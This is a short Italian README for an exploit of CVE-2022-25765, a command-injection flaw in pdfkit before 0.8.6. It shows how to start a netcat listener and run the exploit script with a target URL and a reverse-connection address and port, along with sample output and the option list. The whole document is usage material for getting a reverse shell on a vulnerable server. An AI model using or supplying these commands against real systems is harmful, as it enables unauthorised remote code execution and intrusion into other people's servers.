
Exploit per CVE-2022-25765: iniezione di comandi in pdfkit < 0.8.6
Exploit per l'iniezione di comandi CVE-2022-25765 in pdfkit < 0.8.6
Consulta maggiori dettagli sulla vulnerabilità qui
Esegui netcat sul tuo host:
$ nc -lvnp 1337
Esegui l'exploit (esempio):
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
Opzioni:
-t, --target Indirizzo del target in formato http
-a, --addr Indirizzo per la connessione reverse
-p, --port Porta per la connessione reverse, 9001 di default